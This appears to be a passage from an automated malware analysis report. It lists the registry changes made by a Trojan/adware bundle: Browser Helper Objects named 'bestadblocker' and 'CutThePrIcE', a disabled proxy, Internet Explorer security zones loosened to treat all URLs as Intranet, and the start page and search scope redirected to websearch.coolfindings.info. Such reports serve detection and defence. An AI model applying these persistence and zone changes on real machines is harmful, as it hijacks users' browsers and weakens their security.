"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"date" = "1435726441"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610]
"Version" = "22022148"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"d1abcdb6" = "///%"

"f2c53c49" = "UlAr/XJ/c//k////"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"340d3099" = "/P////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"fe94ce1e" = "V/////%%"
"0dc3ee96" = "/P////%%"
"48bd1aff" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"2d71d5ab" = "V/////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"1520c6f1" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"svpath" = "c:\Program Files\TerminusKeeper\TerminusKeeper.dll"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\00000000]
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan deletes the following registry key(s):

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process rundll32.exe:1256 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "10 9A 19 6B 14 21 9D F0 2C 4E 39 6F 44 CC 42 F8"

The process rundll32.exe:1016 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"d1abcdb6" = "///%"
"0e93c3f3" = "///%"
"f6ad6fa6" = "V/////%%"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\00000000]
"3efeb33e" = ""

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"a0743acc" = "N/////%%"
"8b9e4cbc" = "V/////%%"
"1520c6f1" = "V/////%%"
"a1dcff5b" = "V/////%%"
"6185d035" = "Vx/2/Cx/V//l////"
"c5705860" = "Vx////%%"
"37b7a6d8" = "UlAr/XJ/c//k////"
"72758a5d" = "///%"
"38583bc3" = "Ml/2/CF/M//g/CZ////%"
"bbf88800" = "///%"
"0dc3ee96" = "/P////%%"
"fe94ce1e" = "V/////%%"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\00000000]
"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"7367429f" = "///%"
"c99a5f5c" = "///%"
"f1f24e29" = "Vl/l/C/////%"
"3c09c42b" = "///%"
"c24899a6" = "VP/g/CV/Vl/2/Cx////%"
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"
"0c230bcb" = "///%"
"a2e3b941" = "///%"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"iiid" = "1"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"2d71d5ab" = "V/////%%"
"c6c5dd44" = "V/////%%"
"414bc593" = "///%"
"7f69fa1f" = "///%"
"65114b36" = "Vl/l////"
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1B D3 B0 25 F0 93 DA AB 73 E7 2D CE 9D BC 27 85"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"27ddcf6f" = "///%"
"51d2f2ea" = "IxA3/XZ/FxAm/XJ/PlAf/XD/clAm/XJ/bx////%%"
"f2c53c49" = "UlAr/XJ/c//k////"
"e46c271e" = "///%"
"2e22d94e" = "///%"
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
"e8f9dcc7" = "UlAr/XJ/c//k////"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\00000000]
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"340d3099" = "/P////%%"
"f0bf0bde" = "///%"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\00000000]
"370856c7" = ""

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"587b5709" = "V/////%%"
"48bd1aff" = "V/////%%"

The process regsvr32.exe:2008 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "87 87 45 DC 73 D5 F7 A8 24 75 D3 12 8E C9 97 9B"

[HKCR\TypeLib\{330ED369-73D2-49BC-AC43-1E21602F742D}\1.0\0\win32]
"(Default)" = "%Program Files%\bestadblocker\tEp7pMPAVoxXWr.tlb"

[HKCR\CLSID\{1794EDF4-AB72-4097-9564-4E9260F483B4}\VersionIndependentProgID]
"(Default)" = "P1794EDF4_AB72_4097_9564_4E9260F483B4_"

[HKCR\P1794EDF4_AB72_4097_9564_4E9260F483B4_.P1794EDF4_AB72_4097_9564_4E9260F483B4_\CurVer]
"(Default)" = "P1794EDF4_AB72_4097_9564_4E9260F483B4_.9"

[HKCR\P1794EDF4_AB72_4097_9564_4E9260F483B4_.P1794EDF4_AB72_4097_9564_4E9260F483B4_.9\CLSID]
"(Default)" = "{1794EDF4-AB72-4097-9564-4E9260F483B4}"

[HKCR\CLSID\{1794EDF4-AB72-4097-9564-4E9260F483B4}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{1794EDF4-AB72-4097-9564-4E9260F483B4}]
"(Default)" = ""

[HKCR\CLSID\{1794EDF4-AB72-4097-9564-4E9260F483B4}\InprocServer32]
"(Default)" = "%Program Files%\bestadblocker\tEp7pMPAVoxXWr.dll"

[HKCR\CLSID\{1794EDF4-AB72-4097-9564-4E9260F483B4}\ProgID]
"(Default)" = "P1794EDF4_AB72_4097_9564_4E9260F483B4_.9"

[HKCR\CLSID\{1794EDF4-AB72-4097-9564-4E9260F483B4}]
"(Default)" = "bestadblocker"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext\CLSID]
"{1794EDF4-AB72-4097-9564-4E9260F483B4}" = "1"

[HKCR\CLSID\{1794EDF4-AB72-4097-9564-4E9260F483B4}\Programmable]
"(Default)" = ""

[HKCR\P1794EDF4_AB72_4097_9564_4E9260F483B4_.P1794EDF4_AB72_4097_9564_4E9260F483B4_]
"(Default)" = "bestadblocker"

[HKCR\P1794EDF4_AB72_4097_9564_4E9260F483B4_.P1794EDF4_AB72_4097_9564_4E9260F483B4_\CLSID]
"(Default)" = "{1794EDF4-AB72-4097-9564-4E9260F483B4}"

[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration\{1794EDF4-AB72-4097-9564-4E9260F483B4}]
"(Default)" = ""

[HKCR\P1794EDF4_AB72_4097_9564_4E9260F483B4_.P1794EDF4_AB72_4097_9564_4E9260F483B4_.9]
"(Default)" = "bestadblocker"

It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1794EDF4-AB72-4097-9564-4E9260F483B4}]
"(Default)" = "bestadblocker"

"NoExplorer" = "1"

The process regsvr32.exe:1784 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKCR\Interface\{9F5974D4-08A9-4422-9F36-76103BEE67A1}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration\{296EA12C-9126-48AA-AC11-7ECC0463D2B2}]
"(Default)" = ""

[HKCR\TypeLib\{330ED369-73D2-49BC-AC43-1E21602F742D}\1.0]
"(Default)" = "IEPluginLib"

[HKCR\Interface\{B0030E0C-349C-4EB5-AD5E-847B43C0D844}\TypeLib]
"(Default)" = "{330ED369-73D2-49BC-AC43-1E21602F742D}"

[HKCR\Interface\{3967CDA8-3EAB-4115-84F1-C29A9C5FB484}]
"(Default)" = "IRuntime"

[HKCR\Interface\{B0030E0C-349C-4EB5-AD5E-847B43C0D844}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{296EA12C-9126-48AA-AC11-7ECC0463D2B2}\Programmable]
"(Default)" = ""

[HKCR\Interface\{0B079ECD-60E4-40B9-9FAC-4ECC98AB8786}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\P296EA12C_9126_48AA_AC11_7ECC0463D2B2_.P296EA12C_9126_48AA_AC11_7ECC0463D2B2_.9\CLSID]
"(Default)" = "{296EA12C-9126-48AA-AC11-7ECC0463D2B2}"

[HKCR\Interface\{B0030E0C-349C-4EB5-AD5E-847B43C0D844}\TypeLib]
"Version" = "1.0"

[HKCR\CLSID\{296EA12C-9126-48AA-AC11-7ECC0463D2B2}\InprocServer32]
"(Default)" = "%Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.dll"

[HKCR\Interface\{0B079ECD-60E4-40B9-9FAC-4ECC98AB8786}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{9F5974D4-08A9-4422-9F36-76103BEE67A1}\TypeLib]
"Version" = "1.0"

[HKCR\TypeLib\{330ED369-73D2-49BC-AC43-1E21602F742D}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\Interface\{0B079ECD-60E4-40B9-9FAC-4ECC98AB8786}\TypeLib]
"(Default)" = "{330ED369-73D2-49BC-AC43-1E21602F742D}"

[HKCR\Interface\{0B079ECD-60E4-40B9-9FAC-4ECC98AB8786}]
"(Default)" = "IPlaghinMein"

[HKCR\Interface\{0B079ECD-60E4-40B9-9FAC-4ECC98AB8786}\TypeLib]
"Version" = "1.0"

[HKCR\P296EA12C_9126_48AA_AC11_7ECC0463D2B2_.P296EA12C_9126_48AA_AC11_7ECC0463D2B2_\CurVer]
"(Default)" = "P296EA12C_9126_48AA_AC11_7ECC0463D2B2_.9"

[HKCR\Interface\{3967CDA8-3EAB-4115-84F1-C29A9C5FB484}\TypeLib]
"Version" = "1.0"

[HKCR\Interface\{9F5974D4-08A9-4422-9F36-76103BEE67A1}]
"(Default)" = "IRegistry"

[HKCR\Interface\{3967CDA8-3EAB-4115-84F1-C29A9C5FB484}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{296EA12C-9126-48AA-AC11-7ECC0463D2B2}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext\CLSID]
"{296EA12C-9126-48AA-AC11-7ECC0463D2B2}" = "1"

[HKCR\P296EA12C_9126_48AA_AC11_7ECC0463D2B2_.P296EA12C_9126_48AA_AC11_7ECC0463D2B2_]
"(Default)" = "CutThePrIcE"

[HKCR\Interface\{3967CDA8-3EAB-4115-84F1-C29A9C5FB484}\TypeLib]
"(Default)" = "{330ED369-73D2-49BC-AC43-1E21602F742D}"

[HKCR\CLSID\{296EA12C-9126-48AA-AC11-7ECC0463D2B2}]
"(Default)" = "CutThePrIcE"

[HKCR\TypeLib\{330ED369-73D2-49BC-AC43-1E21602F742D}\1.0\HELPDIR]
"(Default)" = "%Program Files%\CutThePrIcE"

[HKCR\Interface\{9F5974D4-08A9-4422-9F36-76103BEE67A1}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{296EA12C-9126-48AA-AC11-7ECC0463D2B2}]
"(Default)" = ""

[HKCR\Interface\{B0030E0C-349C-4EB5-AD5E-847B43C0D844}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{3967CDA8-3EAB-4115-84F1-C29A9C5FB484}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\P296EA12C_9126_48AA_AC11_7ECC0463D2B2_.P296EA12C_9126_48AA_AC11_7ECC0463D2B2_\CLSID]
"(Default)" = "{296EA12C-9126-48AA-AC11-7ECC0463D2B2}"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0D 9A 22 EF 01 B1 0F C1 82 2F BE 83 3A ED 10 D2"

[HKCR\CLSID\{296EA12C-9126-48AA-AC11-7ECC0463D2B2}\ProgID]
"(Default)" = "P296EA12C_9126_48AA_AC11_7ECC0463D2B2_.9"

[HKCR\CLSID\{296EA12C-9126-48AA-AC11-7ECC0463D2B2}\VersionIndependentProgID]
"(Default)" = "P296EA12C_9126_48AA_AC11_7ECC0463D2B2_"

[HKCR\Interface\{B0030E0C-349C-4EB5-AD5E-847B43C0D844}]
"(Default)" = "ILocalStorage"

[HKCR\P296EA12C_9126_48AA_AC11_7ECC0463D2B2_.P296EA12C_9126_48AA_AC11_7ECC0463D2B2_.9]
"(Default)" = "CutThePrIcE"

[HKCR\TypeLib\{330ED369-73D2-49BC-AC43-1E21602F742D}\1.0\0\win32]
"(Default)" = "%Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.tlb"

[HKCR\Interface\{9F5974D4-08A9-4422-9F36-76103BEE67A1}\TypeLib]
"(Default)" = "{330ED369-73D2-49BC-AC43-1E21602F742D}"

It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{296EA12C-9126-48AA-AC11-7ECC0463D2B2}]
"(Default)" = "CutThePrIcE"

"NoExplorer" = "1"

The process hpds_setup.exe:164 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"b2cc84ee" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/Ul/9/Xl/OP/e/BF/bP/7/Ym/blAu/XD/bxAs/Xx/K/Au/YZ/aPAg/Yh/SxAl/Xt/G//7/CZ/M//g/Cb/NP/v/YZ/OP/f/C//VP/ /B6/V//1/B6/V//e/BF/H/Ap/XP/OP/2/Cb/Vl/2/CJ/Vl/f/CJ/Ml/2/CF/NP/ /Cx/MP/e/CF/NP/e/BF/a/Ar/Ch/QPAN/BF/FlAs/Ch/KPAA////"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope" = "{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}"

[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"51652492" = "///%"
"05502537" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/UlAv/XD/cxAp/XV/alAj/B2/HPAs/X6////%"

[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"81339df5" = "H/Ah/YP/b//4/B6/UlAm/X6/FlAy/Xl/H/Ak/YV/c/////%%"

[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\7fe0f877]
"b2cc84ee" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/Ul/9/Xl/OP/e/BF/bP/7/Ym/blAu/XD/bxAs/Xx/K/Au/YZ/aPAg/Yh/SxAl/Xt/G//7/CZ/M//g/Cb/NP/v/YZ/OP/f/C//VP/ /B6/V//1/B6/V//e/BF/H/Ap/XP/OP/2/Cb/Vl/2/CJ/Vl/f/CJ/Ml/2/CF/NP/ /Cx/MP/e/CF/NP/e/BF/a/Ar/Ch/QPAN/BF/FlAs/Ch/KPAA////"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}]
"FaviconURL" = "websearch.coolfindings.info/favicon.ico"

[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"b2cc84ee" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/Ul/9/Xl/OP/e/BF/bP/7/Ym/blAu/XD/bxAs/Xx/K/Au/YZ/aPAg/Yh/SxAl/Xt/G//7/CZ/M//g/Cb/NP/v/YZ/OP/f/C//VP/ /B6/V//1/B6/V//e/BF/H/Ap/XP/OP/2/Cb/Vl/2/CJ/Vl/f/CJ/Ml/2/CF/NP/ /Cx/MP/e/CF/NP/e/BF/a/Ar/Ch/QPAN/BF/FlAs/Ch/KPAA////"
"81339df5" = "H/Ah/YP/b//4/B6/UlAm/X6/FlAy/Xl/H/Ak/YV/c/////%%"

[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\0caebbe2]
"fd0dde78" = "KlAu/XZ/JlAu/XD/bxAs/Xx////%"

[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"f176879d" = "GxAy/Xl/blAu////"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}]
"DisplayName" = "WebSearch"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}]
"Deleted" = "0"

[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"94362f76" = "KlAu/XZ/JlAu/XD/bxAs/Xx////%"

[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\0caebbe2]
"d7cea243" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/Ul/9/Y//HPAt/Ch/Vx/h/CV/Ml/3/BF/bx/7/CZ/V//e/CJ/Ul/l/Cb/Ul/l/CD/SxAq/Xt/G//7/Cx/Ml/g/Cx/MP/g/CZ/MP/1/Cx/Mx/3/CJ/N// /CD/Mx/3/CD/SxAm/Xb/OPAW/D2/SxAs/XV/OPAK/DD////%"

[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\7fe0f877]
"05502537" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/UlAv/XD/cxAp/XV/alAj/B2/HPAs/X6////%"

[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"64fc053d" = "M/////%%"

[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\7fe0f877]
"b2cc84ee" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/Ul/9/Xl/OP/e/BF/bP/7/Ym/blAu/XD/bxAs/Xx/K/Au/YZ/aPAg/Yh/SxAl/Xt/G//7/CZ/M//g/Cb/NP/v/YZ/OP/f/C//VP/ /B6/V//1/B6/V//e/BF/H/Ap/XP/OP/2/Cb/Vl/2/CJ/Vl/f/CJ/Ml/2/CF/NP/ /Cx/MP/e/CF/NP/e/BF/a/Ar/Ch/QPAN/BF/FlAs/Ch/KPAA////"

[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\0caebbe2]
"94362f76" = "KlAu/XZ/JlAu/XD/bxAs/Xx////%"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}]
"Deleted" = "0"
"FaviconURL" = "websearch.coolfindings.info/favicon.ico"

[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\7fe0f877]
"fd0dde78" = "dlAB/DZ/Ml/h/DP/QP/ /Ct/UPAB/DV/M/AC/Bh/M//e/Cb/Vx/i/Ct/PPAC/CP/UP/1/CV/Vl/e/CJ/Qx/1/CD/PlAX/DF/QPA7////"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}]
"FaviconURLFallback" = "websearch.coolfindings.info/favicon.ico"

[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"ef34a9f6" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/Ul/9/Y//HPAt/Ch/Vx/h/CV/Ml/3/BF/bx/7/CZ/V//e/CJ/Ul/l/Cb/Ul/l/CD/SxAq/Xt/G//7/Cx/Ml/g/Cx/MP/g/CZ/MP/1/Cx/Mx/3/CJ/N// /CD/Mx/3/CD/SxAm/Xb/OPAW/D2/SxAs/XV/OPAK/DD////%"

[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\0caebbe2]
"b2cc84ee" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/Ul/9/Y//HPAt/Ch/Vx/h/CV/Ml/3/BF/bx/7/CZ/V//e/CJ/Ul/l/Cb/Ul/l/CD/SxAq/Xt/G//7/Cx/Ml/g/Cx/MP/g/CZ/MP/1/Cx/Mx/3/CJ/N// /CD/Mx/3/CD/SxAm/Xb/OPAW/D2/SxAs/XV/OPAK/DD/SxAm/Ch/VP/v/YD/OP////%%"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main]
"Start Page" = "websearch.coolfindings.info/?pid=24379&r=2015/07/01&hid=8738532578695851691&lg=EN&cc=UA"

[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"f176879d" = "GxAy/Xl/blAu////"

[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"64fc053d" = "M/////%%"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}]
"FaviconURLFallback" = "websearch.coolfindings.info/favicon.ico"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}]
"DisplayName" = "WebSearch"

[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\7fe0f877]
"05502537" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/UlAv/XD/cxAp/XV/alAj/B2/HPAs/X6////%"

[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\0caebbe2]
"fd0dde78" = "KlAu/XZ/JlAu/XD/bxAs/Xx////%"

[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"d7cea243" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/Ul/9/Y//HPAt/Ch/Vx/h/CV/Ml/3/BF/bx/7/CZ/V//e/CJ/Ul/l/Cb/Ul/l/CD/SxAq/Xt/G//7/Cx/Ml/g/Cx/MP/g/CZ/MP/1/Cx/Mx/3/CJ/N// /CD/Mx/3/CD/SxAm/Xb/OPAW/D2/SxAs/XV/OPAK/DD////%"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes]
